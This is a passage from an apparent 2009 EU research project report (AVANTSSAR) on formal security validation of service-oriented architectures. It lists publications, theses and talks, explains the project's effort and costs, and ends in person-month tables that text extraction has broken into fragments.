[31] M. Barletta, S. Ranise, and L. Viganò. A Declarative Two-Level Frame-work to Specify and Verify Workflow and Authorization Policies inService-Oriented Architectures. 2009. Draft, submitted to a journal.

[32] D. Basin and C. Cremers. From Dolev-Yao to Strong Adaptive Corrup-tion: Analyzing Security in the Presence of Compromising Adversaries,2009. Draft, submitted.

[33] E. Burato, M. Cristani, and L. Viganò. A Deduction System for MeaningNegotiation. 2009. Draft, submitted.

[34] J. Camenisch, S. Mödersheim, G. Neven, F.-S. Preiss, and D. Sommer. ACredential-Based Access Control Requirements Language. 2009. Draft,available as IBM Research Report RZ3748.

[35] Y. Chevalier and M. Kourjieh. Decidability of Ground Entailment Prob-lems for Order Saturated Sets of Clauses. 2009. Draft, available as IRITResearch Report IRIT/RR–2010-3–FR.

[36] A. Masini, L. Viganò, and M. Volpe. Labeled Natural Deduction fora Bundled Branching Temporal Logic. 2009. Draft, submitted to ajournal.



[37] S. Mödersheim and D. Sommer. A Formal Model of Identity Mixer.2009. Draft, available as IBM Research Report RZ3749.

5.6 AVANTSSAR theses

[38] R. Carbone. LTL Model-Checking for Security Protocols. Univer-sità degli Studi di Genova, Italy - 2009. http://ai-lab.it/carbone/Phd-thesis/

[39] F. Cheikh. Composition de services: algorithmes et complexité. PhDthesis, Université de Toulouse, Toulouse, France, 2009.

[40] N. Chridi. Contributions à la vérification automatique de protocoles degroupes Université Henri Poincaré - Nancy 1, September 2009. http://tel.archives-ouvertes.fr/tel-00417290/en/

[41] M. Kourjieh. Logical analysis and verification of cryptographic proto-cols. PhD thesis, Université de Toulouse, France, 2009.



5.7 AVANTSSAR talks and presentations1. Secure pseudonymous channels

Luca Viganò (UNIVR)Presentation of [25] at the Center for Logic and Computation of the In-stituto Superior Tecnico, Lisbon, Portugal, January 23, 2009. (Alreadylisted in D1.3 [AVA08a].)

2. La sicurezza informatica: attacchi e soluzioniLuca Viganò (UNIVR)Invited talk, including a project presentation, at “Infinita...mente” (aweekend of science and arts, http://www.infinitamente.univr.it/),Verona, Italy, January 31 and February 1, 2009. (Already listed inD1.3 [AVA08a].)

3. Secure pseudonymous channelsLuca Viganò (UNIVR)Invited talk in theWorkshoplet on Formal Methods for Security, Padova,Italy, March 12, 2009.

4. Secure pseudonymous channelsLuca Viganò (UNIVR)Presentation of [25] at the Department of Informatics and Mathemat-ics, Technical University of Denmark, Copenhagen, Denmark, April 2,2009.

5. Validation methodologiesLuca Viganò (UNIVR)Invited keynote at the FIA Prague Trust and Identity Session “IdentityProvisioning in service platforms”, Future Internet Conference, Prague,Czech Republic, May 12, 2009.

6. Verifying the Interplay of Authorization Policies and Workflow in Service-Oriented ArchitecturesLuca Viganò (UNIVR)Presentation of [14] at the Center for Logic and Computation of theInstituto Superior Tecnico, Lisbon, Portugal, July 10, 2009.

7. On-the-Fly Model Checking of Security Protocols and Web ServicesLuca Viganò (UNIVR)Invited lecture at the 9th International School on Foundations of Secu-rity Analysis and Design (FOSAD), Centro Universitario Residenzialedi Bertinoro, FC, Italy, August 29 – September 04, 2009.



8. Verso la validazione automatica della sicurezza delle architetture ori-entate ai serviziLuca Viganò (UNIVR)Faculty of Sciences of the University of Verona, Verona, Italy, Septem-ber 23, 2009.

9. Automated Validation of Trust and Security of Service-oriented Archi-tecturesLuca Viganò (UNIVR)Invited talk at the ZISC Colloquium, Zurich Information Security Cen-ter (ZISC), Zurich, Switzerland, November 24, 2009.

10. Verifying the Interplay of Authorization Policies and Workflow in Service-Oriented ArchitecturesMichele Barletta (UNIVR).Presentation of [14] at the 9th International School on Foundations ofSecurity Analysis and Design (FOSAD), Centro Universitario Residen-ziale di Bertinoro, FC, Italy, September 04, 2009.

11. Towards Verification of Security-Aware Transaction E-servicesSilvio Ranise (UNIVR)International Workshop on First-Order Theorem Proving, Oslo, Nor-way, July 6–7 2009.Presentation of [28].

12. Verifying the Interplay of Authorization Policies and Workflow in Service-Oriented ArchitecturesSilvio Ranise (UNIVR)International Symposium on Secure Computing (SecureCom 2009),Vancouver, Canada, August 29–31.Presentation of [14].

13. Verifying the Interplay of Authorization Policies and Workflow in Service-Oriented ArchitecturesSilvio Ranise (UNIVR)Microsoft Research, Redmond, WA, USA, September 01.Invited presentation of [14].

14. Optimistic fair exchange using trusted devicesMohammad Torabi Dashti (ETH Zurich)11th International Symposium on Stabilization, Safety, and Security ofDistributed Systems (SSS 2009), Lyon, France, November 3–6, 2009.Presentation of [30]



15. From Dolev-Yao to Strong Adaptive Corruption: Analyzing Security inthe Presence of Compromising AdversariesCas Cremers (ETH Zurich)Invited talk at the Security Seminar at VERIMAG, Grenoble, France,February 10, 2009.

16. From Dolev-Yao to Strong Adaptive Corruption: Analyzing Security inthe Presence of Compromising AdversariesCas Cremers (ETH Zurich)Invited talk in theWorkshoplet on Formal Methods for Security, Padova,Italy, March 12, 2009.

17. Cryptographic protocols as Building Blocks: From the Man-in-the-Middleattack to Compositional Symbolic AnalysisCas Cremers (ETH Zurich)Invited talk at the LSV Seminar, ENS Cachan, Paris, France, March31, 2009.

18. Session-state Reveal is stronger than Ephemeral Key Reveal: Attackingthe NAXOS Authenticated Key Exchange protocolCas Cremers (ETH Zurich)ACNS’09, Paris, France, June 2, 2009.

19. Formalizing and analyzing compromising adversariesCas Cremers (ETH Zurich)Invited talk at the Information Security seminar at Royal HollowayUniversity of London, November 12, 2009.

20. Validating Integrity for the Ephemerizer’s Protocol with CL-AtseMathieu Turuani (INRIA)1st Luxembourg Day on Security and Reliability. Luxembourg, Febru-ary 10, 2009.

21. Decidable Analysis for a Class of Cryptographic Group Protocols withUnbounded ListsNajah Chridi (INRIA)22nd IEEE Computer Security Foundations Symposium. Port Jeffer-son. July 8-10. Presentation of [18].

22. A Flexible Access Control Model for Distributed Collaborative EditorsAsma Cherif (INRIA)Secure Data Management, 6th VLDB Workshop, SDM 2009. Lyon,August 28. Presentation of [22].



23. Orchestration under security constraints.Mohamed Anis Mekki (INRIA)6th International Workshop on Formal Aspects in Security and Trust(FAST2009). Eindhoven, the Netherlands, November 5–6, 2009.Presentation of [5].

24. Master Courses on Security of Web Services.and Master Courses on Security of Networks and Services.Laurent Vigneron (INRIA, Nancy 2) Fall 2009. University of Nancy,France.

25. Approche logique pour les contraintes de contrôle d’accès dans les ser-vices WebMarwa El Houri (UPS-IRIT)1er atelier sur les droits d’accès à des services et des données définisdans un environnement collaboratif (SDEC 2009). Toulouse, May 2009.Presentation of [9].

26. A logical framework for reasoning about policies with trust negotiationsand workflows in a distributed environmentMarwa El Houri (UPS-IRIT)4th International Conference on Risks and Security of Internet andSystems (CRiSIS 2009). Toulouse, October 2009.Presentation of [10].

27. Résultats de complexité pour le problème de la composition d’agentsGuillaume Feuillade (UPS-IRIT)5èmes journées francophones sur les modèles formels de l’interaction(MFI 2009). Lannion, June 2009.Presentation of [11].

28. Controller/orchestrator synthesis via filtrationGuillaume Feuillade (UPS-IRIT)Methods for Modalities (M4M 2009). Copenhagen, November 2009.Presentation of [12].

29. Formal Analysis of SAML 2.0 Web Browser Single Sign-On: Breakingthe SAML-based Single Sign-On for Google AppsAlessandro Armando (UGDIST)Invited Talk at Center for Information Technology - IRST, FondazioneBruno Kessler, Trento, March 2, 2009.



30. Formal Specification and Automatic Analysis of Business Processes un-der Authorization Constraints: an Action-based Approach.Serena Elisa Ponta (UGDIST)6th International Conference on Trust, Privacy and Security in DigitalBusiness (TrustBus’09). Linz, Austria, August 31–September 4, 2009.Presentation of [4].

31. Model Checking of Security-sensitive Business Processes.Serena Elisa Ponta (UGDIST)6th International Workshop on Formal Aspects in Security and Trust(FAST2009). Eindhoven, the Netherlands, November 5–6, 2009.Presentation of [5].

32. Algebraic Properties in Alice and Bob NotationSebastian Mödersheim (IBM)4th International Conference on Availability, Reliability and Security(ARES), Fukuoka, Japan, March 16th - 19th, 2009.Presentation of [24]

33. Secure Pseudonymous ChannelsSebastian Mödersheim (IBM)14th European Symposium on Research in Computer Security (ES-ORICS), Saint Malo, France, September 21–23, 2009.Presentation of [25]

34. Integrating Automated and Interactive Protocol VerificationSebastian Mödersheim (IBM) (with Achim Brucker (SAP))6th International Workshop on Formal Aspects in Security and Trust(FAST), Eindhoven, the Netherlands, November 5–6, 2009.Presentation of [15].

35. A calculus to detect guessing attacksMarius Minea (IEAT)12th International Conference on Information Security, Pisa, Italy, Septem-ber 7–9, 2009.Presentation of [20].

36. Validating Security Protocols under the General AttackerXavier Chantry (SAP)Joint Workshop on Automated Reasoning for Security Protocol Anal-ysis and Issues in the Theory of Security (ARSPA-WITS 2009, March28-29, 2009, York, UK.Presentation of [8].



37. Attacking Each OtherXavier Chantry (SAP)17th International Workshop on Security Protocols (IWSP 2009), April1-3, 2009, Cambridge, UK.Presentation of [7].

38. AVANTSSAR Demo on Trust and Security of Internet of Services (IoS)Alessandro Sorniotti (SAP)The Future of the Internet Conference (FIA Prague), May 11-13, 2009,Prague, Czech Republic.Demo of the discovery of the serious vulnerability to SAML-based SSOfor Google Apps.

39. Avantssar Industry Migration: NW SAML NGSSO - Initial set of re-sults of 2009 collaborationLuca Compagna (SAP)SAP AG - NW SIM, June 16, 2009, Virtual talk.The initial set of results have been discussed with the SAP SteeringCommittee and Experts Group (people selected from SAP NW Secu-rity and Identity Management).

40. Avantssar Industry Migration: NW BPM - security validator plugin -interim result of 2009 collaborationWihem Arsac (SAP)NetWeaver BPM transfering activity review, September 28, 2009, Wall-dorf, Germany.The interim results have been discussed with the SAP NetWeaver BPMtransfering committee (people selected from SAP NW Business ProcessManagement).

41. Model Checking (security-annotated) Business Processes in SAP NetWeaverBPMWihem Arsac (SAP)Security Week at SAP LABS France, November 23-27, 2009, SophiaAntipolis, France.

42. Avantssar Industry Migration: NW SAML NGSSO - results of 2009collaboration and next stepsLuca Compagna (SAP)SAP AG - NW SIM, November 26, 2009, Walldorf, Germany.The final results achieved in 2009 and next steps have been discussedwith the SAP Steering Committee and Experts Group (people selectedfrom SAP NW Security and Identity Management).



43. Avantssar Industry Migration: NW BPM - our security validator pluginLuca Compagna (SAP)SAP AG - NW BPM, November 27, 2009, Walldorf, Germany.Presentation of the pre-final results achieved to core people of SAPNetWeaver BPM.

44. Avantssar Industry Migration: NW BPM - our security validator pluginWihem Arsac (SAP)SAP AG - Sales Montpellier, December 14, 2009, Virtual talk.Presentation of our security validator plugin to SAP Sales. This workmay be showed in the future to events targeting SAP customers.

45. Avantssar Industry Migration: NW BPM - security validator plugin -result of 2009 collaboration and next stepsWihem Arsac (SAP)NetWeaver BPM transfering activity review, December 15, 2009, Wall-dorf, Germany.The final results achieved in 2009 and next steps have been discussedwith the SAP NetWeaver BPM transfering committee (people selectedfrom SAP NW Business Process Management).



6 Explanation of the use of the resourcesThe following pages detail the resources and the cost breakdown (including alist of the meetings and related expenses). The resources and correspondingcosts are all inline with what planned and estimated in the Description ofWork.

We begin by detailing the resources, then provide explanations of person-nel costs, subcontracting and any major direct costs, and conclude by listingthe costs for the meetings (grouped as “General project meetings”, “Workingmeetings” and “Participation to European and scientific events”).



6.1 ResourcesThe tables Table 4 – Table 7 summarize the total resources for Period P2.Progress overview sheets for the beneficiaries, detailing the resources, aregiven in tables Table 8 – Table 17.

Some remarks:

• The additional effort by UNIVR on WP5 is due to the fact that juniorresearchers were hired to work on the project, which resulted in thework being carried out with an effort higher than originally plannedbut within the foreseen overall costs. Therefore, this deviation withrespect to the initial estimate has marginal impact on the resources.

• Considering the effort annual average, IRIT’s effort for 2009 was around4 person-months more than expected. This effort increase is related tothe completion of their PhD by two of our students. The impact isnonetheless marginal, because of the cost structure, on the overall costfor the IRIT partner.

• The additional effort by UGDIST on WP2 is due to the fact that juniorresearchers were hired to work on the project, which resulted in thework being carried out with an effort higher than originally plannedbut within the foreseen overall costs. Therefore, this deviation withrespect to the initial estimate has marginal impact on the resources.

• IEAT’s effort for 2009 was 3 person-months less than planned, dueto a leave of absence taken by a PhD student at the beginning ofthe year. For 2010, IEAT will employ part-time an additional PhDand a Master’s student, for work on WP4 (tool support) and WP5(modelling), resulting in additional person-months to the project at noextra cost.

• The reduced effort by SAP is due to the fact that a number of seniorresearchers were hired to work on the project, which resulted in thework being carried out with an effort lower than originally planned butwithin the foreseen overall costs. Therefore, this deviation with respectto the initial estimate has marginal impact on the resources.



Table4:

Totalresou

rces

forPe

riodP2

WP

/Task

Sta

rtE

nd

Sta

rtE

nd

Est

To

tal

Act

P1

Act

P2

Act

P1+

P2

Rem

ain

ing

effort

Pro

ject

Man

ag

em

en

tW

P 1

136

136

22.0

05.4

87.1

312.6

19.3

9

Pro

ject C

oord

inatio

nW

P 1

.11

36

1

5.2

50.9

42.1

33.0

7

Pro

ject M

eetin

gs

WP

1.2

136

1

9.3

03.0

02.1

15.1

1

Pro

ject A

dm

inis

tratio

nW

P 1

.31

36

1

7.4

51.5

42.8

94.4

3

Mo

delin

g t

rust

an

d s

ecu

rity

asp

ects

…W

P 2

130

130

99.0

038.7

252.2

590.9

78.0

3

Initi

al v

ers

ion o

f A

SLan…

WP

2.1

19

19

37.5

035.5

76.2

241.7

9

Ext

ended v

ers

ion o

f A

SLan…

WP

2.2

10

18

10

32.7

53.1

545.3

348.4

8

Fin

al v

ers

ion o

f A

SLan…

WP

2.3

19

30

28.7

50.0

00.7

00.7

0

Au

tom

ate

d r

easo

nin

g t

ech

niq

ues

WP

31

36

1

154.0

047.9

460.9

5108.8

945.1

1

Satis

fiabili

ty o

f A

SLan p

olic

ies

WP

3.1

130

1

45.9

810.0

817.6

627.7

4

Model c

heckin

g o

f A

SLan s

erv

ices…

WP

3.2

632

6

33.6

66.7

917.7

224.5

1

Attacker

models

WP

3.3

110

110

35.7

027.9

414.9

142.8

5

Com

posi

tional r

easo

nin

g f

or

serv

ices

…W

P 3

.46

34

6

26.6

62.7

28.7

311.4

5

Abst

ractio

n techniq

ues…

WP

3.5

934

9

12.0

00.4

11.9

32.3

4

Th

e A

VA

NT

SS

AR

Valid

ati

on

Pla

tfo

rmW

P 4

136

136

110.0

010.9

942.0

453.0

356.9

7

The T

S O

rchest

rato

rW

P 4

.16

30

6

35.5

07.1

98.6

015.7

9

The T

S V

alid

ato

rW

P 4

.26

30

6

52.7

53.5

015.3

618.8

6

Pla

tform

inte

gra

tion

WP

4.3

630

6

21.7

50.3

018.0

818.3

8

Pro

of

of

co

ncep

tW

P 5

136

136

109.0

045.8

941.9

087.7

921.2

1

Definiti

on o

f th

e r

ele

vant pro

ble

m c

ase

sW

P 5

.11

61

619.5

027.8

40.5

528.3

9

Form

alis

atio

n o

f th

e p

roble

m c

ase

sW

P 5

.23

30

3

48.5

016.0

525.8

441.8

9

Valid

atio

n o

f th

e p

roble

m c

ase

sW

P 5

.39

36

9

24.0

02.0

09.8

511.8

5

Ass

ess

ment

WP

5.4

936

9

17.0

00.0

05.6

65.6

6

Dis

sem

inati

on

an

d in

du

str

y m

igra

tio

nW

P 6

136

136

96.0

018.8

122.4

341.2

454.7

6

Dis

sem

inatio

nW

P 6

.11

36

1

37.0

04.7

511.4

816.2

3

Mig

ratio

n to in

dust

rial d

eve

lopm

ent env

WP

6.2

136

1

51.0

013.7

68.9

522.7

1

Mig

ratio

n to s

tandard

isatio

n b

odie

sW

P 6

.325

36

4

8.0

00.3

02.0

02.3

0

590.0

0167.8

4226.7

0394.5

4195.4

6

To

tal

AV

AN

TS

SA

R

Pla

nn

ed

Date

Actu

al D

ate



Table5:

Totalr

esou

rces

forPe

riodP2

(fulltable,

part

1/3)

P1

P2

P3

P1

P2

P3

P1

P2

P3

WP

/Task

Sta

rtE

nd

Sta

rtE

nd

Act

Act

Act

Est

Act

Act

Act

Act

Est

Act

Act

Act

Act

Est

Act

Pro

ject

Man

ag

em

en

tW

P 1

136

136

2.7

64.5

40.0

013.0

07.3

00.3

00.3

00.0

01.0

00.6

00.3

00.3

00.0

01.0

00.6

0

Pro

ject C

oord

inatio

nW

P 1

.11

36

1

0.9

42.1

20.0

05.0

03.0

60.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

0

Pro

ject M

eetin

gs

WP

1.2

136

1

1.1

80.6

20.0

04.0

01.8

00.2

00.2

00.0

00.7

00.4

00.2

00.2

00.0

00.7

00.4

0

Pro

ject A

dm

inis

tratio

nW

P 1

.31

36

1

0.6

41.8

00.0

04.0

02.4

40.1

00.1

00.0

00.3

00.2

00.1

00.1

00.0

00.3

00.2

0

Mo

delin

g t

rust

an

d s

ecu

rity

asp

ects

…W

P 2

130

130

1.8

59.4

20.0

015.0

011.2

710.0

010.0

00.0

020.0

020.0

02.0

02.0

00.0

05.0

04.0

0

Initi

al v

ers

ion o

f A

SLan…

WP

2.1

19

19

1.7

00.0

00.0

05.0

01.7

09.0

01.0

00.0

07.0

010.0

02.0

00.0

00.0

01.0

02.0

0

Ext

ended v

ers

ion o

f A

SLan…

WP

2.2

10

18

10

0.1

58.7

20.0

05.0

08.8

71.0

09.0

00.0

07.0

010.0

00.0

02.0

00.0

02.0

02.0

0

Fin

al v

ers

ion o

f A

SLan…

WP

2.3

19

30

0.0

00.7

00.0

05.0

00.7

00.0

00.0

00.0

06.0

00.0

00.0

00.0

00.0

02.0

00.0

0

Au

tom

ate

d r

easo

nin

g t

ech

niq

ues

WP

31

36

1

6.4

610.0

10.0

020.0

016.4

74.0

08.0

00.0

026.0

012.0

09.7

07.3

00.0

023.0

017.0

0

Satis

fiabili

ty o

f A

SLan p

olic

ies

WP

3.1

130

1

0.6

02.2

30.0

08.0

02.8

30.0

00.0

00.0

02.0

00.0

01.7

01.3

00.0

08.0

03.0

0

Model c

heckin

g o

f A

SLan s

erv

ices…

WP

3.2

632

6

0.7

91.3

20.0

03.0

02.1

11.0

03.0

00.0

07.0

04.0

00.0

06.0

00.0

03.0

06.0

0

Attacker

models

WP

3.3

110

110

3.7

13.1

20.0

03.0

06.8

32.5

02.0

00.0

08.0

04.5

08.0

00.0

00.0

010.0

08.0

0

Com

posi

tional r

easo

nin

g f

or

serv

ices

…W

P 3

.46

34

6

1.2

22.5

60.0

03.0

03.7

80.5

03.0

00.0

09.0

03.5

00.0

00.0

00.0

02.0

00.0

0

Abst

ractio

n techniq

ues…

WP

3.5

934

9

0.1

40.7

80.0

03.0

00.9

20.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

0

Th

e A

VA

NT

SS

AR

Valid

ati

on

Pla

tfo

rmW

P 4

136

136

0.1

96.1

70.0

012.0

06.3

60.0

03.0

00.0

013.0

03.0

07.0

07.0

00.0

019.0

014.0

0

The T

S O

rchest

rato

rW

P 4

.16

30

6

0.1

90.6

20.0

05.0

00.8

10.0

01.0

00.0

02.0

01.0

07.0

06.0

00.0

011.0

013.0

0

The T

S V

alid

ato

rW

P 4

.26

30

6

0.0

02.4

30.0

07.0

02.4

30.0

02.0

00.0

010.0

02.0

00.0

00.0

00.0

08.0

00.0

0

Pla

tform

inte

gra

tion

WP

4.3

630

6

0.0

03.1

20.0

00.0

03.1

20.0

00.0

00.0

01.0

00.0

00.0

01.0

00.0

00.0

01.0

0

Pro

of

of

co

ncep

tW

P 5

136

136

7.6

46.8

60.0

05.0

014.5

03.7

04.7

00.0

07.0

08.4

02.0

02.0

00.0

06.0

04.0

0

Definiti

on o

f th

e r

ele

vant pro

ble

m c

ase

sW

P 5

.11

61

66.4

10.5

50.0

01.0

06.9

61.0

00.0

00.0

02.0

01.0

00.0

00.0

00.0

00.0

00.0

0

Form

alis

atio

n o

f th

e p

roble

m c

ase

sW

P 5

.23

30

3

1.2

34.7

60.0

02.0

05.9

92.7

04.0

00.0

02.0

06.7

01.0

01.0

00.0

03.0

02.0

0

Valid

atio

n o

f th

e p

roble

m c

ase

sW

P 5

.39

36

9

0.0

01.5

50.0

01.0

01.5

50.0

00.7

00.0

02.0

00.7

01.0

01.0

00.0

03.0

02.0

0

Ass

ess

ment

WP

5.4

936

9

0.0

01.4

60.0

01.0

01.4

60.0

00.0

00.0

01.0

00.0

00.0

00.0

00.0

00.0

00.0

0

Dis

sem

inati

on

an

d in

du

str

y m

igra

tio

nW

P 6

136

136

1.7

53.2

80.0

08.0

05.0

30.0

00.0

00.0

05.0

00.0

00.0

02.2

70.0

05.0

02.2

7

Dis

sem

inatio

nW

P 6

.11

36

1

1.7

52.9

60.0

06.0

04.7

10.0

00.0

00.0

03.0

00.0

00.0

02.2

70.0

04.0

02.2

7

Mig

ratio

n to in

dust

rial d

eve

lopm

ent env

WP

6.2

136

1

0.0

00.3

20.0

01.0

00.3

20.0

00.0

00.0

01.0

00.0

00.0

00.0

00.0

01.0

00.0

0

Mig

ratio

n to s

tandard

isatio

n b

odie

sW

P 6

.325

36

4

0.0

00.0

00.0

01.0

00.0

00.0

00.0

00.0

01.0

00.0

00.0

00.0

00.0

00.0

00.0

0

20.6

540.2

80.0

073.0

060.9

318.0

026.0

00.0

072.0

044.0

021.0

020.8

70.0

059.0

041.8

7

UN

IVR

ET

H Z

uri

ch

INR

IA

Pla

nn

ed

Date

Actu

al

Date

To

tal

To

tal

To

tal



Table6:

Totalr

esou

rces

forPe

riodP2

(fulltable,

part

2/3)

P1

P2

P3

P1

P2

P3

P1

P2

P3

P1

P2

P3

WP

/Task

Sta

rtE

nd

Sta

rtE

nd

Act

Act

Act

Est

Act

Act

Act

Act

Est

Act

Act

Act

Act

Est

Act

Act

Act

Act

Est

Act

Pro

ject

Man

ag

em

en

tW

P 1

136

136

0.2

50.2

50.0

01.0

00.5

00.5

00.0

00.0

01.0

00.5

00.3

00.6

50.0

01.0

00.9

50.4

00.3

00.0

01.2

00.7

0

Pro

ject

Coord

ination

WP

1.1

136

1

0.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

10.0

00.2

50.0

10.0

00.0

00.0

00.0

00.0

0

Pro

ject

Meetings

WP

1.2

136

1

0.2

50.2

50.0

00.7

00.5

00.0

00.0

00.0

00.3

00.0

00.3

00.2

50.0

00.5

00.5

50.4

00.1

00.0

00.7

00.5

0

Pro

ject

Adm

inis

tration

WP

1.3

136

1

0.0

00.0

00.0

00.3

00.0

00.5

00.0

00.0

00.7

00.5

00.0

00.3

90.0

00.2

50.3

90.0

00.2

00.0

00.5

00.2

0

Mo

delin

g t

rust

an

d s

ecu

rity

asp

ects

…W

P 2

130

130

4.7

84.4

00.0

08.0

09.1

82.0

013.0

00.0

05.0

015.0

03.9

52.1

20.0

06.0

06.0

70.4

00.6

00.0

03.0

01.0

0

Initia

l vers

ion o

f A

SLan…

WP

2.1

19

19

4.7

80.0

00.0

04.0

04.7

82.0

00.0

00.0

02.0

02.0

03.9

50.7

20.0

02.0

04.6

70.4

00.0

00.0

01.5

00.4

0

Ext

ended v

ers

ion o

f A

SLan…

WP

2.2

10

18

10

0.0

04.4

00.0

02.0

04.4

00.0

013.0

00.0

02.0

013.0

00.0

01.4

00.0

02.0

01.4

00.0

00.6

00.0

00.7

50.6

0

Fin

al vers

ion o

f A

SLan…

WP

2.3

19

30

0.0

00.0

00.0

02.0

00.0

00.0

00.0

00.0

01.0

00.0

00.0

00.0

00.0

02.0

00.0

00.0

00.0

00.0

00.7

50.0

0

Au

tom

ate

d r

easo

nin

g t

ech

niq

ues

WP

31

36

1

10.7

816.1

30.0

024.0

026.9

16.5

08.5

00.0

020.0

015.0

02.1

82.3

20.0

014.0

04.5

00.2

00.1

00.0

00.8

00.3

0

Satisfiabili

ty o

f A

SLan p

olic

ies

WP

3.1

130

1

7.7

814.1

30.0

016.0

021.9

10.0

00.0

00.0

04.0

00.0

00.0

00.0

00.0

02.0

00.0

00.0

00.0

00.0

00.3

20.0

0

Model checkin

g o

f A

SLan s

erv

ices…

WP

3.2

632

6

1.0

00.0

00.0

06.0

01.0

03.0

06.0

00.0

06.0

09.0

00.0

00.0

00.0

02.0

00.0

00.0

00.1

00.0

00.1

60.1

0

Att

acker

models

WP

3.3

110

110

1.0

00.0

00.0

00.0

01.0

03.5

02.5

00.0

05.0

06.0

01.9

10.0

00.0

02.0

01.9

10.2

00.0

00.0

00.1

60.2

0

Com

positio

nal re

asonin

g for

serv

ices …

WP

3.4

634

6

1.0

02.0

00.0

02.0

03.0

00.0

00.0

00.0

03.0

00.0

00.0

01.1

70.0

02.0

01.1

70.0

00.0

00.0

00.1

60.0

0

Abstr

action t

echniq

ues…

WP

3.5

934

9

0.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

02.0

00.0

00.2

71.1

50.0

06.0

01.4

20.0

00.0

00.0

00.0

00.0

0

Th

e A

VA

NT

SS

AR

Valid

ati

on

Pla

tfo

rmW

P 4

136

136

0.0

01.1

50.0

012.0

01.1

53.0

015.0

00.0

024.0

018.0

00.0

03.3

60.0

08.0

03.3

60.0

00.4

00.0

02.0

00.4

0

The T

S O

rchestr

ato

rW

P 4

.16

30

6

0.0

00.5

80.0

010.0

00.5

80.0

00.0

00.0

04.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.4

00.0

00.7

50.4

0

The T

S V

alid

ato

rW

P 4

.26

30

6

0.0

00.5

70.0

00.0

00.5

73.0

03.0

00.0

010.0

06.0

00.0

03.3

60.0

06.0

03.3

60.0

00.0

00.0

01.0

00.0

0

Pla

tform

inte

gra

tion

WP

4.3

630

6

0.0

00.0

00.0

02.0

00.0

00.0

012.0

00.0

010.0

012.0

00.0

00.0

00.0

02.0

00.0

00.0

00.0

00.0

00.2

50.0

0

Pro

of

of

co

ncep

tW

P 5

136

136

1.5

00.4

00.0

02.0

01.9

04.0

00.0

00.0

05.0

04.0

03.5

51.2

00.0

06.0

04.7

52.1

00.2

00.0

07.0

02.3

0

Definitio

n o

f th

e r

ele

vant

pro

ble

m c

ases

WP

5.1

16

16

0.5

00.0

00.0

00.0

00.5

00.0

00.0

00.0

00.0

00.0

03.3

30.0

00.0

01.0

03.3

32.1

00.0

00.0

01.0

02.1

0

Form

alis

ation o

f th

e p

roble

m c

ases

WP

5.2

330

3

1.0

00.4

00.0

01.0

01.4

03.0

00.0

00.0

02.0

03.0

00.2

21.2

00.0

02.0

01.4

20.0

00.2

00.0

03.0

00.2

0

Valid

ation o

f th

e p

roble

m c

ases

WP

5.3

936

9

0.0

00.0

00.0

01.0

00.0

01.0

00.0

00.0

02.0

01.0

00.0

00.0

00.0

02.0

00.0

00.0

00.0

00.0

02.0

00.0

0

Assessm

ent

WP

5.4

936

9

0.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

01.0

00.0

00.0

00.0

00.0

01.0

00.0

00.0

00.0

00.0

01.0

00.0

0

Dis

sem

inati

on

an

d in

du

str

y m

igra

tio

nW

P 6

136

136

0.0

00.3

70.0

05.0

00.3

70.5

01.0

00.0

05.0

01.5

01.4

72.2

80.0

05.0

03.7

54.4

00.4

00.0

017.0

04.8

0

Dis

sem

ination

WP

6.1

136

1

0.0

00.3

70.0

04.0

00.3

70.5

01.0

00.0

02.0

01.5

00.7

12.2

80.0

04.0

02.9

90.0

00.0

00.0

00.0

00.0

0

Mig

ration t

o industr

ial develo

pm

ent

env

WP

6.2

136

1

0.0

00.0

00.0

01.0

00.0

00.0

00.0

00.0

02.0

00.0

00.7

60.0

00.0

01.0

00.7

64.4

00.4

00.0

017.0

04.8

0

Mig

ration t

o s

tandard

isation b

odie

sW

P 6

.325

36

4

0.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

01.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

0

17.3

122.7

00.0

052.0

040.0

116.5

037.5

00.0

060.0

054.0

011.4

611.9

30.0

040.0

023.3

97.5

02.0

00.0

031.0

09.5

0

UG

DIS

TIB

MO

pen

Tru

st

UP

S I

RIT

Pla

nn

ed

Date

Actu

al

Date

To

tal

To

tal

To

tal

To

tal



Table7:

Totalr

esou

rces

forPe

riodP2

(fulltable,

part

3/3)

P1

P2

P3

P1

P2

P3

P1

P2

P3

P1

P2

P3

WP

/Task

Sta

rtE

nd

Sta

rtE

nd

Act

Act

Act

Est

Act

Act

Act

Act

Est

Act

Act

Act

Act

Est

Act

Act

Act

Act

Est

Act

Pro

ject

Man

ag

em

en

tW

P 1

136

136

0.3

00.4

00.0

01.0

00.7

00.0

70.0

90.0

01.0

00.1

60.3

00.3

00.0

01.0

00.6

05.4

87.1

30.0

022.2

012.6

1

Pro

ject

Coord

ination

WP

1.1

136

1

0.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.0

00.9

42.1

30.0

05.2

53.0

7

Pro

ject

Meetings

WP

1.2

136

1

0.2

00.2

00.0

00.7

00.4

00.0

70.0

90.0

00.5

00.1

60.2

00.2

00.0

00.7

00.4

03.0

02.1

10.0

09.5

05.1

1

Pro

ject

Adm

inis

tration

WP

1.3

136

1

0.1

00.2

00.0

00.3

00.3

00.0

00.0

00.0

00.5

00.0

00.1

00.1

00.0

00.3

00.2

01.5

42.8

90.0

07.4

54.4

3

Mo

delin

g t

rust

an

d s

ecu

rity

asp

ects

…W

P 2

130

130

1.5

02.0

00.0

09.0

03.5

06.1

42.2

10.0

016.0

08.3

56.1

06.5

00.0

012.0

012.6

038.7

252.2

50.0

099.0

090.9

7

Initia

l vers

ion o

f A

SLan…

WP

2.1

19

19

1.5

00.0

00.0

03.0

01.5

06.1

40.0

00.0

06.0

06.1

44.1

04.5

00.0

06.0

08.6

035.5

76.2

20.0

037.5

041.7

9

Ext

ended v

ers

ion o

f A

SLan…

WP

2.2

10

18

10

0.0

02.0

00.0

03.0

02.0

00.0

02.2

10.0

05.0

02.2

12.0

02.0

00.0

04.0

04.0

03.1

545.3

30.0

032.7

548.4

8

Fin

al vers

ion o

f A

SLan…

WP

2.3

19

30

0.0

00.0

00.0

03.0

00.0

00.0
